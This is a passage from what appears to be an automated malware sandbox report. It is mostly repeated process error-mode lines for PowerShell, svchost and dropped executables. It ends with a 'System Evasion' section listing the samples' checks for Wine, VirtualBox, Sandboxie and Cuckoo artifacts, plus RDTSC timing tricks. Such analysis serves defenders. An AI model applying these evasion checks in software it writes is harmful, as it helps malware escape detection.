                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: Yara matchFile source: Process Memory Space: zudFSfy.exe PID: 8048, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: kz8ZdyP.exe PID: 4916, type: MEMORYSTR
                              Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9736
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000002.2764543210.000000000018C000.00000004.00000001.01000000.00000014.sdmp, ac68c6b737.exe, 00000015.00000002.2765777233.0000000000C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000002.2764543210.000000000018C000.00000004.00000001.01000000.00000014.sdmp, ac68c6b737.exe, 00000015.00000002.2765777233.0000000000C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003595000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-^Q
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLCUCKOOMON.DLL
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6F2F second address: 9C6F67 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F684908B761h 0x00000014 jmp 00007F684908B768h 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6F67 second address: 9C6F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F684904922Ch 0x0000000e ja 00007F6849049226h 0x00000014 rdtsc
